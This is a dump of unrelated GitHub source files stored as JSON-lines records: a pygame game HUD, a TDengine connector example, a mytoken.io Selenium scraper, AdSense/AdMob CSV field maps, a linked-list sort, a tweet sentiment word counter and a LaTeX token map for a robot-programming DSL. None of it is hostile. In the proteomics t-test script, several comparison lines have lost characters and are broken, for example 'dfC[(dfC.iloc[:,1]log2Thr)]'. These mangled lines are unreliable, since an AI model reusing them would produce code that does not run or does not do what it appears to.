card_to_turn=input(looser+\", you have lost, which card do you want to turn: \")\n while card_to_turn not in array:\n card_to_turn=input(\"You must give a card from your maze: \")\n return card_to_turn\n \n def Refresh(self, card):\n random.shuffle(self.maze)\n new_card=self.maze.pop(0)\n self.maze.append(card)\n return new_card\n \n \n \n \n \n \n \n ","repo_name":"ICC3103-202110/proyecto-01-silva_vial","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":6657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6394338655","text":"import pygame\r\nimport pygame.font\r\n\r\nclass Hub():\r\n\t\"\"\"Borders, Health display, Special, and score display.\"\"\"\r\n\t\r\n\tdef __init__(self, ai, var, screen):\r\n\t\tself.screen = screen\r\n\t\tself.ai = ai\r\n\t\tself.var = var\r\n\t\t\r\n\t\t# Card\r\n\t\tself.card = pygame.image.load('images/hub/p_claude.png')\r\n\t\tself.card = pygame.transform.scale2x(self.card)\r\n\t\tself.c_rect = self.card.get_rect()\r\n\t\tself.c_rect.bottom = ai.height - 12\r\n\t\tself.c_rect.centerx = ai.width/2\r\n\t\t\r\n\t\t# Initialize health\r\n\t\tself.h_bar = float(100)\r\n\t\tself.h_shade_1 = (160, 248, 104)\r\n\t\tself.h_shade_2 = (72, 216, 0)\r\n\t\tself.h_shade_3 = (64, 136, 32)\r\n\t\tself.h_y = self.c_rect.bottom - 72\r\n\t\t\r\n\t\t# Initialize shield\r\n\t\tself.s_bar = float(100)\r\n\t\tself.s_shade_1 = (247, 238, 54)\r\n\t\tself.s_shade_2 = (247, 177, 0)\r\n\t\tself.s_shade_3 = (247, 85, 0)\r\n\t\tself.s_y = self.h_y + 24\r\n\t\t\r\n\t\t# Score font\r\n\t\tself.score = 0\r\n\t\tself.s_color = (255, 255, 255)\r\n\t\tself.s_font = pygame.font.SysFont(None, 28)\r\n\t\t\r\n\t\tself.pause = 1\t\t\r\n\t\tself.chapter = 0\r\n\t\tself.current = 0\r\n\t\tself.death = 0\r\n\t\tself.timed = 0\r\n\t\t\r\n#\t\tself.init = 0\r\n#\t\tself.start = 1\r\n#\t\tself.inputs = 1\r\n#\t\tself.backgrounds = 1\r\n#\t\tself.bullets = 1\r\n#\t\tself.lasers = 1\r\n#\t\tself.ship = 1\r\n#\t\tself.enemy = 1\r\n#\t\tself.hub = 1\r\n\t\t\r\n\t\t# Skip Title Scren\r\n\t\tself.init = 1\r\n\t\tself.start = 0\r\n\t\tself.inputs = 0\r\n\t\tself.backgrounds = 0\r\n\t\tself.bullets = 0\r\n\t\tself.lasers = 0\r\n\t\tself.ship = 0\r\n\t\tself.enemy = 0\r\n\t\tself.hub = 0\r\n\t\t\r\n\tdef update(self, ai):\r\n\t\t# Limits\r\n\t\tif self.h_bar <= 0:\r\n\t\t\tself.h_bar = 0\r\n\t\telif self.h_bar >= 100:\r\n\t\t\tself.h_bar = 100\r\n\t\t\t\r\n\t\tif self.s_bar <= 0:\r\n\t\t\tself.s_bar = 0\r\n\t\telif self.s_bar >= 100:\r\n\t\t\tself.s_bar = 100\r\n\t\t\r\n\t\t# black borders\r\n\t\tpygame.draw.rect(self.screen, (0, 0, 0), (0, 0, ai.width, (116)))\r\n\t\tpygame.draw.rect(self.screen, (0, 0, 0), (0, ((ai.height-116)), ai.width, (116)))\t\r\n\t\t# Card\r\n\t\tself.screen.blit(self.card, self.c_rect)\t\r\n\t\t# health bar\r\n\t\tpygame.draw.rect(self.screen, self.h_shade_1, ((self.c_rect.left + 90), (self.h_y), (self.h_bar), 2))\r\n\t\tpygame.draw.rect(self.screen, self.h_shade_2, ((self.c_rect.left + 90), (self.h_y + 2), (self.h_bar), 1))\r\n\t\tpygame.draw.rect(self.screen, self.h_shade_3, ((self.c_rect.left + 90), (self.h_y + 3), (self.h_bar), 1))\r\n\t\t# shield bar\r\n\t\tpygame.draw.rect(self.screen, self.s_shade_1, ((self.c_rect.left + 90), (self.s_y), (self.s_bar), 2))\r\n\t\tpygame.draw.rect(self.screen, self.s_shade_2, ((self.c_rect.left + 90), (self.s_y + 2), (self.s_bar), 1))\r\n\t\tpygame.draw.rect(self.screen, self.s_shade_3, ((self.c_rect.left + 90), (self.s_y + 3), (self.s_bar), 1))\r\n\t\t\r\n\t\t# Score\r\n\t\tself.s_str = str(self.score)\r\n\t\tself.s_img = self.s_font.render(self.s_str, True, self.s_color, (0, 0, 0))\r\n\t\tself.s_rect = self.s_img.get_rect()\r\n\t\tself.s_rect.right = 23 * ai.width / 24\r\n\t\tself.s_rect.centery = ai.height / 24\r\n\t\tself.screen.blit(self.s_img, self.s_rect)\r\n\t\t\r\n\tdef halt(self):\r\n\t\t\"\"\"Pauses all processes.\"\"\"\r\n\t\tself.inputs *= -1\r\n\t\tself.backgrounds *= -1\r\n\t\tself.bullets *= -1\r\n\t\tself.lasers *= -1\r\n\t\tself.ship *= -1\r\n\t\tself.enemy *= -1\r\n\t\t\r\n\tdef za_wurado(self, ai):\r\n\t\tself.bullets = 1\r\n\t\tself.lasers = 1\r\n\t\tself.enemy = 1\r\n\t\tai.static_speed = 0\r\n\t\tai.static_speed = 0\r\n\r\n","repo_name":"c3mead/fragments","sub_path":"hub.py","file_name":"hub.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39097922325","text":"import taosrest\nimport os\n\n\ndef connect_to_cloud_use_token(url, token):\n conn = taosrest.connect(url=url,\n token=token)\n\n print(conn.server_info)\n cursor = conn.cursor()\n cursor.execute(\"drop database if exists pytest\")\n cursor.execute(\"create database pytest precision 'ns' keep 365\")\n cursor.execute(\"create table pytest.temperature(ts timestamp, temp int)\")\n cursor.execute(\"insert into pytest.temperature values(now, 1) (now+10b, 2)\")\n cursor.execute(\"select * from pytest.temperature\")\n rows = cursor.fetchall()\n print(rows)\n\n\nif __name__ == '__main__':\n url = os.environ[\"TDENGINE_CLOUD_URL\"]\n token = os.environ[\"TDENGINE_CLOUD_TOKEN\"]\n connect_to_cloud_use_token(url, token)\n","repo_name":"taosdata/taos-connector-python","sub_path":"examples/connect_cloud_service.py","file_name":"connect_cloud_service.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"61"} +{"seq_id":"34762325459","text":"#python proteinGroupsTtestCombine.py L:\\promec\\TIMSTOF\\LARS\\2022\\februar\\Sigrid\\combined\\txtDQnoPHOS\\reports\\CTRL\nimport sys\n#!pip3 install pathlib --user\nfrom pathlib import Path\nif len(sys.argv)!=2: sys.exit(\"\\n\\nREQUIRED: pandas, pathlib; tested with Python 3.9 \\n\\nUSAGE: python proteinGroupsTtestCombine.py \\n\\nExample\\n\\npython proteinGroupsTtestCombine.py L:\\promec\\TIMSTOF\\LARS\\2022\\februar\\Sigrid\\combined\\txt\\reports\\CTRL\")\npathFiles = Path(sys.argv[1])\n#pathFiles=Path(\"L:/promec/TIMSTOF/LARS/2022/\")\nfileName='*tTestBH.csv'\ntrainList=list(pathFiles.rglob(fileName))\ntrainList=[fN for fN in trainList if \"eate\" in str(fN)]\n#trainList=list([Path('L:/promec/TIMSTOF/LARS/2022/februar/Sigrid/combined/txt/reports/CTRL/proteinGroups.txtLFQ.intensity.16MUT CtrlWT Ctrl0.050.50.05BiotTestBH.csv'),Path('L:/promec/TIMSTOF/LARS/2021/Desember/211207_Nilu/combined/txt/proteinGroups.txt'),Path('L:/promec/TIMSTOF/LARS/2022/februar/Sigrid/combined/txt/reports/CTRL/proteinGroups.txtLFQ.intensity.16MUTctrlWTctrl0.050.50.05grouptTestBH.csv')])\n#!pip3 install pandas --user\nimport pandas as pd\n#df = pd.concat(map(pd.read_table, trainList))\n#df.to_csv(pathFiles.with_suffix('.combinedT.txt'),sep=\"\\t\")#,rownames=FALSE)\n#f=trainList[1]\ndfC=pd.DataFrame()\ndfB=pd.DataFrame()\ni=0\nfdrThrHigh=0.1\nfdrThrLow=10e5\nlog2Thr=0.5\nfor f in trainList:\n i=i+1\n if Path(f).stat().st_size > 0:\n print(f\"{i!r},{f.parts!r}\")\n proteinHits=pd.read_csv(f)\n proteinHits.rename({'RowGeneUniProtScorePeps':'ID'},inplace=True,axis='columns')\n proteinHits=proteinHits[~proteinHits['ID'].str.contains(\"HUMAN\",na=False)]\n #proteinHits=proteinHits[proteinHits.CorrectedPValueBHlog2Thr)| (proteinHits.Log2MedianChange<-1*log2Thr)]\n proteinHitsC=proteinHits.ID.str.split(';;', expand=True).set_index(proteinHits.Log2MedianChange).stack().reset_index(level=0, name='ID')\n proteinHitsC=proteinHitsC[proteinHitsC.index==1]\n #proteinHitsC=proteinHitsC.ID.str.split(';', expand=True).set_index(proteinHits.Log2MedianChange).stack().reset_index(level=0, name='ID')\n proteinHitsC=proteinHitsC[proteinHitsC['ID']!=\"\"]\n proteinHitsB=proteinHits.ID.str.split(';;', expand=True).set_index(proteinHits.CorrectedPValueBH).stack().reset_index(level=0, name='ID')\n proteinHitsB=proteinHitsB[proteinHitsB.index==1]\n #proteinHitsB=proteinHitsB.ID.str.split(';', expand=True).set_index(proteinHits.CorrectedPValueBH).stack().reset_index(level=0, name='ID')\n proteinHitsB=proteinHitsB[proteinHitsB['ID']!=\"\"]\n proteinHitsC['Name']=f.parts[7]+f.parts[6]+f.parts[-1]+str(i)\n proteinHitsB['Name']=f.parts[7]+f.parts[6]+f.parts[-1]+str(i)\n dfC=pd.concat([dfC,proteinHitsC],sort=False)\n dfB=pd.concat([dfB,proteinHitsB],sort=False)\nprint(dfC.columns)\nprint(dfB.columns)\ndfC=dfC.pivot(index='ID', columns='Name', values='Log2MedianChange')\ndfC.to_csv(pathFiles.with_suffix('.Log2MedianChange.combined.csv'))\ndfB=dfB.pivot(index='ID', columns='Name', values='CorrectedPValueBH')\ndfB.to_csv(pathFiles.with_suffix('.CorrectedPValueBH.combined.csv'))\ndf=pd.merge(dfC, dfB, on='ID')\ndf.to_csv(pathFiles.with_suffix('.Log2MedianChange.CorrectedPValueBH.combined.csv'))\nimport seaborn as sns\nsns.jointplot(y=dfC.iloc[:,1],x=dfC.iloc[:,0]).figure.savefig(pathFiles.with_suffix(\".log2Scatter.svg\"),dpi=100,bbox_inches = \"tight\")#,kind=\"reg\")\ndfC=dfC.fillna(0)\ndfCB=dfC[(dfC.iloc[:,1]>log2Thr)&(dfC.iloc[:,0]>log2Thr)]\ndfCB.to_csv(pathFiles.with_suffix('.BOTH.Log2MedianChange.combined.csv'))\ndfC1=dfC[(dfC.iloc[:,1]log2Thr)]\ndfC1.to_csv(pathFiles.with_suffix('.first.Log2MedianChange.combined.csv'))\ndfC2=dfC[(dfC.iloc[:,1]>log2Thr)&(dfC.iloc[:,0] 0:\n print(i,f.parts[-3],f.parts[-4],f.parts[-5])\n proteinHits=pd.read_csv(f,low_memory=False,sep='\\t')\n proteinHitsLFQ=proteinHits.assign(ID=proteinHits['Protein IDs'].str.split(';')).explode('ID')\n proteinHitsLFQ.index=proteinHitsLFQ['ID']\n proteinHitsLFQ=proteinHitsLFQ.add_suffix(f.parts[-3]+f.parts[-4]+f.parts[-5]+'F'+str(i))\n dfLFQ=pd.concat([dfLFQ,proteinHitsLFQ],axis=1)\nprint(dfLFQ.columns)\n#dfLFQ['211207_NiluDesember2'].hist()\n#(dfLFQ['211221_NiluDesember3']-dfLFQ['Score211221_NiluDesemberF3']).hist()\ndfLFQ.to_csv(pathFiles/(fileName+\"Combo.csv\"))\ndfS=dfLFQ.filter(like='Peptide sequence', axis=1)\n#dfS=dfLFQ[:,[dfLFQ.filter(like='Peptide sequence', axis=1)]].apply(lambda x: ''.join(x), axis=1)\ndfLFQPeptides=dfS[dfS.columns].apply(lambda x:','.join(x.dropna().astype(str)),axis=1)\n#dfLFQPeptides['C9J1R6']#EFPDLGAHCSEPSCQR\n#dfLFQPeptides.filter(like='HTSALCNSCR')#EFPDLGAHCSEPSCQR,HPLDHDCSGEGHPTSR;HRHPLDHDCSGEGHPTSR,HPLDHDCSGEGHPTSR;HRHPLDHDCSGEGHPTSR\ndfLFQPeptides.to_csv(pathFiles/(fileName+\"dfLFQPeptides.csv\"))\ndfLFQvals=dfLFQ.filter(like='LFQ', axis=1)\n#dfLFQvals=dfLFQ.filter(like='Intensity', axis=1)\ndfLFQvals.to_csv(pathFiles/(fileName+\"dfLFQvals.csv\"))\ndfLFQvalsSeqs=pd.concat([dfLFQvals,dfLFQPeptides],axis=1)\ndfLFQvalsSeqs.to_csv(pathFiles/(fileName+\"dfLFQvalsSeqs.csv\"))\ndfLFQvalsSeqsMedian=dfLFQvalsSeqs.groupby(0).median()\ndfLFQid=dfLFQPeptides.reset_index()\ndfLFQidC=dfLFQid.groupby(0).agg({'ID': ';'.join})\ndfLFQvalsSeqsUni=pd.concat([dfLFQidC,dfLFQvalsSeqsMedian],axis=1)\ndfLFQvalsSeqsUni.to_csv(pathFiles/(fileName+\"dfLFQvalsSeqsUni.csv\"))\nlog2dfLFQvalsSeqsUni=dfLFQvalsSeqsUni.fillna(0)\nlog2dfLFQvalsSeqsUni.index=log2dfLFQvalsSeqsUni['ID']\nlog2dfLFQvalsSeqsUni=log2dfLFQvalsSeqsUni.drop(['ID'], axis=1)\nlog2dfLFQvalsSeqsUni=np.log2(log2dfLFQvalsSeqsUni+1)\n#log2dfLFQvalsSeqsUni.hist()#.figure.savefig(pathFiles/(fileName+\"log2dfLFQvalsSeqsUni.hist.svg\"),dpi=100,bbox_inches = \"tight\")\nlog2dfLFQvalsSeqsUni.to_csv(pathFiles/(fileName+\"log2dfLFQvalsSeqsUni.csv\"))\nlog2dfLFQvalsSeqsUni.plot(kind='hist',alpha=0.5,bins=100).figure.savefig(pathFiles/(fileName+\"log2dfLFQvalsSeqsUni.svg\"),dpi=100,bbox_inches = \"tight\")","repo_name":"animesh/scripts","sub_path":"proteinGroupsTtestCombine.py","file_name":"proteinGroupsTtestCombine.py","file_ext":"py","file_size_in_byte":8530,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"24261800165","text":"# -*- encoding: utf-8 -*-\n\nCSV_FIELD_NAME_TRANSFORM = {\n # Adsense zh-TW\n \"日期\" : \"Date\",\n \"月份\" : \"Month\",\n \"星期\" : \"Week\",\n \"預估收益 (USD)\": \"Estimated earnings (USD)\",\n \"瀏覽量\": \"Page views\",\n \"網頁千次曝光收益 (USD)\": \"Page RPM (USD)\",\n \"曝光次數\": \"Impressions\",\n \"曝光千次曝光收益 (USD)\": \"Impression RPM (USD)\",\n \"Active View 可視率\": \"Active View Viewable\",\n \"點擊\": \"Clicks\",\n \"點閱率\": \"CTR\",\n \"單次點擊出價 (USD)\": \"CPC (USD)\",\n\n # Adsense zh-CN\n \"日期\" : \"Date\",\n \"月\" : \"Month\",\n \"周\" : \"Week\",\n \"估算收入 (USD)\" : \"Estimated earnings (USD)\",\n \"网页浏览量\" : \"Page views\",\n \"网页 RPM (USD)\" : \"Page RPM (USD)\",\n \"展示次数\" : \"Impressions\",\n \"每千次展示收入 (USD)\" : \"Impression RPM (USD)\",\n \"Active View 可见率\" : \"Active View Viewable\",\n \"点击次数\" : \"Clicks\",\n \"点击率\" : \"CTR\",\n\n # Admob zh-TW\n \"週次\" : \"Week\",\n \"月份\" : \"Month\",\n \"預估收益 (USD)\" : \"Estimated earnings (USD)\",\n \"曝光\" : \"Impressions\",\n \"觀察到的有效千次曝光出價 (USD)\": \"Impression RPM (USD)\",\n \"點擊次數\": \"Clicks\",\n \"點閱率 (%) (%)\" : \"CTR%\",\n\n # GA3 zh-TW\n \"日索引\": \"Date\",\n \"使用者\": \"User\",\n \"新使用者\": \"NewUser\",\n\n # Firebase zh-CN\n \"第 N 天\" : \"\",\n \"30 天\" : \"\",\n \"7 天\" : \"\",\n \"1 天\" : \"\",\n}\n\nCSV_FIREBASE_KEYWORD = {\n \"活跃用户随时间的变化趋势如何?\" : \"DAU\",\n \"开始日期\" : \"Begin\",\n \"结束日期\" : \"End\",\n}\n\nCSV_KEYWORD_USAGE = {\n \"活跃用户随时间的变化趋势如何?\" : \"\",\n \"开始日期\" : \"\",\n \"结束日期\" : \"\",\n}\n\nCSV_FIELD_VALUE_TRANSFORM = {\n \"CTR%\" : {\n \"handlerType\": \"function\",\n \"handler\": lambda x: str(float(x.replace('%',''))*0.01),\n \"newFieldName\": \"CTR\",\n },\n \"Clicks\": {\n \"handlerType\": \"calc\",\n \"handler\": lambda row: (row['Estimated earnings (USD)'] / row[\"Clicks\"]) if row[\"Clicks\"] != 0 else 0,\n \"newFieldName\": \"CPC (USD)\",\n },\n \"Impressions\": {\n \"handlerType\": \"calc\",\n \"handler\": lambda row: (row['Clicks'] / row[\"Impressions\"]) if row[\"Impressions\"] != 0 else 0,\n \"newFieldName\": \"CTR\",\n },\n}\n\nCSV_FIELD_NAME_DATA_TYPE = {\n #\"Date\": str,\n #\"Month\": str,\n #\"Week\": str,\n \"Estimated earnings (USD)\": 1.0,\n \"Page views\": 1,\n \"Page RPM (USD)\": 1.0,\n \"Impressions\": 1,\n \"Impression RPM (USD)\": 1.0,\n #\"Active View Viewable\": str,\n \"CTR\": 1.0,\n \"Clicks\": 1,\n \"CPC (USD)\": 1.0,\n}\n\nCSV_OUTPUT_ADSENSE_FIELDS = [\n 'Estimated earnings (USD)', 'Impressions', 'Impression RPM (USD)', 'Clicks', 'CTR', 'CPC (USD)',\n]\n\nCSV_OUTPUT_GA_FIELDS = [\n 'User', 'NewUser', 'PageView',\n]\n\nCSV_INPUT_CHECK_MAIN_FIELD = [\n 'Date', 'Week', 'Month',\n]\n\nCSV_OUTPUT_REPORT_COMPARISON_INFO = [\n\t'Estimated earnings (USD)', 'Average earnings (USD)' , 'Average CPC',\n]\n\nCSV_OUTPUT_FIELD_NAME_DATA_TYPE = {\n #\"Date\": str,\n #\"Month\": str,\n #\"Week\": str,\n \"Estimated earnings (USD)\": 1.0,\n \"Page views\": 1,\n \"Page RPM (USD)\": 1.0,\n \"Impressions\": 1,\n \"Impression RPM (USD)\": 1.0,\n #\"Active View Viewable\": str,\n \"CTR\": 1.0,\n \"Clicks\": 1,\n \"CPC (USD)\": 1.0,\n}\n\n","repo_name":"changyy/google-csv-helper","sub_path":"google_csv_helper/csv_common.py","file_name":"csv_common.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"39624500584","text":"'''\nOwned and authored by Ian Loeb.\n\nDescription: A webscraping script to pull \"hot search\" data from mytoken.io using BS4 and Selenium.\nThe script will save the data to a mytoken_data.xlsx spreadsheet.\n\nInstructions:\ninstall:\n\tbeautifulsoup4\n\tselenium\n\tpandas\n\tgeckodriver\n\topenpyxl\n\txlrd\n\nTo run:\n\tpython(python3) scrape.py\n\nTo change intervcal between requests:\n\tread line 79 comment\n\nTo change time length script will run:\n\tread line 67 comment\n\n'''\n\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\nfrom bs4 import BeautifulSoup\nimport os\nimport time\nimport pandas as pd\nimport datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\n\ndef scrape(url, df):\n\tdriver.get(url)\n\tsoup = BeautifulSoup(driver.page_source, 'lxml')\n\tdivs = soup.findAll('tr', attrs={'class':'ant-table-row ant-table-row-level-0'})\n\ttime_now = datetime.datetime.now()\n\tcount = 1\n\tfor div in divs:\n\t\tname_div = div.find('div', attrs={'class': 'name'})\n\t\tfire_div = div.findAll('div', attrs={'class': 'fire-item'})\n\t\tname = name_div.find(text=True)\n\t\tfire=0\n\t\tfor i in fire_div:\n\t\t\timg = i.find('img')\n\t\t\tif img['alt'] == '0':\n\t\t\t\tfire += 0.5\n\t\t\telif img['alt'] == '1':\n\t\t\t\tfire += 1\n\t\tdf.at[time_now, name+'_rank'] = count\n\t\tdf.at[time_now, name+'_heat'] = fire\n\t\tcount += 1\n\nurl = 'http://www.mytoken.io'\n\noptions = Options()\noptions.add_argument('--headless')\ndriver = webdriver.Firefox(options=options)\n\ndf = pd.read_excel('mytoken_data.xlsx', index_col=0)\n\ncount = 0\nwhile count<6: #number of x*interval seconds script will run\n\tscrape(url, df)\n\ttime.sleep(5) #interval in seconds\n\tcount += 1\ndf.to_excel('mytoken_data.xlsx')","repo_name":"iloeb99/mytokenio_scrape","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33997254483","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return a ListNode\n def sortList(self, head):\n pointer=head\n len=0\n while pointer: #calculate the length\n len=len+1\n pointer=pointer.next\n head=self.mergesort(head,len)\n pointer=head\n while len>1:\n pointer=pointer.next\n len=len-1\n if pointer:\n pointer.next=None\n return head\n\n def mergesort(self,node,len):\n if len<= 1:\n return node\n mid=len//2\n pointer=node\n fh=node #fisrt head\n fl=mid #first len\n t=mid\n while t>0:\n t=t-1\n pointer=pointer.next\n #fisrt: mid (head to mid) second: len-mid (mid+1 to tail)\n sh=pointer #second head\n sl=len-mid #second len\n fh=self.mergesort(fh,fl)\n sh=self.mergesort(sh,sl)\n newlist=ListNode(0) #\n pointer=newlist\n while fl>0 and sl>0: #do not use `fh and sh`, fh.next is not None!\n if fh.val < sh.val:\n pointer.next=fh\n pointer=pointer.next\n fh=fh.next\n fl=fl-1\n else:\n pointer.next=sh\n pointer=pointer.next\n sh=sh.next\n sl=sl-1\n while fl>0:\n pointer.next=fh\n pointer=pointer.next\n fh=fh.next\n fl=fl-1\n while sl>0:\n pointer.next=sh\n pointer=pointer.next\n sh=sh.next\n sl=sl-1\n if newlist.next:\n return newlist.next\n else:\n return None\n\nif __name__=='__main__':\n head=ListNode(4)\n head.next=ListNode(3)\n head.next.next=ListNode(5)\n head.next.next.next=ListNode(2)\n head=Solution().sortList(head)\n while head:\n print(head.val)\n head=head.next\n pass\n","repo_name":"javayhu/XSolutions","sub_path":"python/SortList.py","file_name":"SortList.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74441026754","text":"import os\nimport argparse\nimport json\nimport pandas as pd\nimport src.clean_data as clean\n\ndef add_to_sentiment_count(entry, counts, sentiment):\n if entry in counts[sentiment]:\n counts[sentiment][entry] += 1\n else:\n counts[sentiment][entry] = 1\n\ndef remove_rares(total_count, other_dict, min_count):\n for entry in total_count:\n if total_count[entry] < min_count:\n for key in other_dict:\n for sentiment in other_dict[key]: # remove rare words from every sentiment dictionary\n other_dict[key][sentiment].pop(entry, None)\n\ndef main(tweet_file):\n # make an easily accessible dictionary of stopwords\n script_path = os.path.abspath(os.path.dirname(__file__))\n stop_path = os.path.join(script_path, '..', 'data', 'stopwords.txt')\n stopwords = clean.get_stopwords(stop_path)\n\n # initialization\n total_count = {}\n\n # stores the number of times a given word is used by a tweet in each category\n label_count = {\n 'covid/pandemic': {'positive': {}, 'negative': {}, 'neutral': {}},\n 'economy': {'positive': {}, 'negative': {}, 'neutral': {}},\n 'government': {'positive': {}, 'negative': {}, 'neutral': {}},\n 'movement': {'positive': {}, 'negative': {}, 'neutral': {}},\n 'precaution': {'positive': {}, 'negative': {}, 'neutral': {}},\n 'vaccine': {'positive': {}, 'negative': {}, 'neutral': {}},\n 'variant': {'positive': {}, 'negative': {}, 'neutral': {}}\n }\n\n tweets = pd.read_csv(tweet_file, encoding='iso-8859-1')\n for index in range(0, len(tweets)):\n label = tweets.loc[index, 'Label'].casefold()\n if label in label_count:\n words = tweets.loc[index, 'text']\n for word in clean.process_tweet(words, stopwords):\n sentiment = tweets.loc[index, 'Sentiment']\n add_to_sentiment_count(word, label_count[label], sentiment)\n clean.add_to_count(word, total_count)\n\n # removes words that aren't used at least 5 (can change if necessary) times in total\n remove_rares(total_count, label_count, 5)\n return label_count\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('tweet_file', help='Enter the name of the file that contained all the tweets.')\n # parser.add_argument('output_file')\n args = parser.parse_args()\n\n tweet_file = args.tweet_file\n\n # if you need to specify different output directories, uncomment this\n #output = os.path.abspath(args.output)\n #output_dir = os.path.dirname(output)\n #if not os.path.isdir(output_dir):\n # os.makedirs(output_dir)\n\n label_count = main(tweet_file)\n\n script_path = os.path.abspath(os.path.dirname(__file__))\n with open(os.path.join(script_path, '..', 'data', 'catagorywise_label_words.json'), 'w') as f:\n json.dump(label_count, f, indent=4)\n","repo_name":"jgu13/Data_Science_COVID19_Emotion_Analysis_Project","sub_path":"src/catogotywise_clean_data.py","file_name":"catogotywise_clean_data.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30752256508","text":"import time\n\nclass Largestprimefactor:\n\n def __init__(self):\n self.start()\n\n def start(self):\n t1 = time.clock()\n self.calculate(600851475143)\n t2 = time.clock()\n print('Time: %0.6f' % (t2-t1))\n \n def calculate(self,n):\n y = 2\n while y * y <= n:\n if n % y == 0:\n n = n/y\n if(n != 1 and y* y >= n):\n print(int(n)) \n y+=1\n\n\na = Largestprimefactor()\n\n","repo_name":"Crysis-Gomez/PythonProjectEuler","sub_path":"problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9643958183","text":"import json\nimport os\n\n#### latex dictionary\nlatex_dict = {\n 'run': '\\\\textcode{def }\\DSLRun\\\\textcode{()}',\n 'if_only': 'if_only',\n 'ifelse': 'ifelse',\n 'if_else': 'if_else',\n 'if':'if',\n 'do': '\\DSLIf',\n 'else': '\\DSLElse',\n 'while': '\\DSLWhile',\n 'repeat': '\\DSLRepeat',\n 'repeat_until_goal': '\\DSLRepeatUntil',\n 'bool_path_ahead': '\\DSLBoolPathAhead',\n 'bool_no_path_ahead': '\\DSLBoolNoPathAhead',\n 'bool_path_left': '\\DSLBoolPathLeft',\n 'bool_no_path_left': '\\DSLBoolNoPathLeft',\n 'bool_path_right': '\\DSLBoolPathRight',\n 'bool_no_path_right': '\\DSLBoolNoPathRight',\n 'bool_marker': '\\DSLBoolMarker',\n 'bool_no_marker': '\\DSLBoolNoMarker',\n 'bool_goal': '\\DSLBoolGoal',\n 'X': '\\SDSLIter',\n '2': '2',\n '3': '3',\n '4': '4',\n '5': '5',\n '6': '6',\n '7': '7',\n '8': '8',\n '9': '9',\n 'A': '\\SDSLAction\\\\\\\\',\n 'bool_cond': '\\SDSLBoolCond',\n 'move': '\\DSLMove\\\\\\\\',\n 'turn_right': '\\DSLTurnRight\\\\\\\\',\n 'turn_left': '\\DSLTurnLeft\\\\\\\\',\n 'pick_marker': '\\DSLPickMarker\\\\\\\\',\n 'put_marker': '\\DSLPutMarker\\\\\\\\'\n}\nmcq_sol_dict = {\n 'move': '\\DSLMove',\n 'turnleft': '\\DSLTurnLeft',\n 'turnright': '\\DSLTurnRight',\n 'pickmarker': '\\DSLPickMarker',\n 'putmarker': '\\DSLPutMarker'\n}\n\n\nMACROS = \"macros_code.txt\"\n\ndef get_macros(macros_file = MACROS):\n script_dir = os.path.dirname(__file__) # <-- absolute dir the script is in\n rel_path = macros_file\n abs_file_path = os.path.join(script_dir, rel_path)\n with open(abs_file_path, 'r') as f:\n data = f.read()\n return data\n\n\ndef get_string_from_json(json_obj: dict):\n json_string = json.dumps(json_obj)\n #print(json_string)\n arr = json_string.split(' ')\n #print(arr)\n clean_arr = []\n for ele in arr:\n if '\"type\"' in ele:\n continue\n elif ele == '\"children\":':\n clean_arr.append('children[')\n elif '\"run\"' in ele:\n clean_arr.append('run')\n elif '\"move\"' in ele:\n clean_arr.append('move')\n elif '\"turn_left\"' in ele:\n clean_arr.append('turn_left')\n elif '\"turn_right\"' in ele:\n clean_arr.append('turn_right')\n elif '\"pick_marker\"' in ele:\n clean_arr.append('pick_marker')\n elif '\"put_marker\"' in ele:\n clean_arr.append('put_marker')\n elif '\"A\"' in ele:\n clean_arr.append('A')\n elif '\"do\"' in ele:\n clean_arr.append('do')\n elif '\"else\"' in ele and '\"ifelse\"' not in ele and '\"if_else\"' not in ele:\n clean_arr.append('else')\n else:\n if '}' in ele:\n mele = ele.split('}')\n clean_arr.append(mele[0][1:-1])\n else:\n clean_arr.append(ele[1:-2])\n if ']' in ele:\n c = ele.count(']')\n for i in range(c):\n clean_arr.append(']')\n\n return clean_arr\n\n\ndef check_token_arr(arr: list):\n '''checks the token arr for incomplete program constructs,\n and adds empty children if needed'''\n new_arr = []\n for i in range(len(arr)-1):\n ele = arr[i]\n nele = arr[i+1]\n new_arr.append(ele)\n if 'run' in ele:\n if 'children[' not in nele:\n new_arr.append('children[')\n new_arr.append(']')\n else:\n continue\n\n if 'repeat' in ele and 'repeat_until_goal' not in ele:\n if 'children[' not in nele:\n new_arr.append('children[')\n new_arr.append(']')\n else:\n continue\n\n if 'repeat_until_goal' in ele:\n if 'children[' not in nele:\n new_arr.append('children[')\n new_arr.append(']')\n else:\n continue\n\n if 'while' in ele:\n if 'children[' not in nele:\n new_arr.append('children[')\n new_arr.append(']')\n else:\n continue\n\n if 'do' in ele:\n if 'children[' not in nele:\n new_arr.append('children[')\n new_arr.append(']')\n else:\n continue\n\n if 'else' in ele:\n if 'children[' not in nele:\n new_arr.append('children[')\n new_arr.append(']')\n else:\n continue\n\n\n if 'run' in 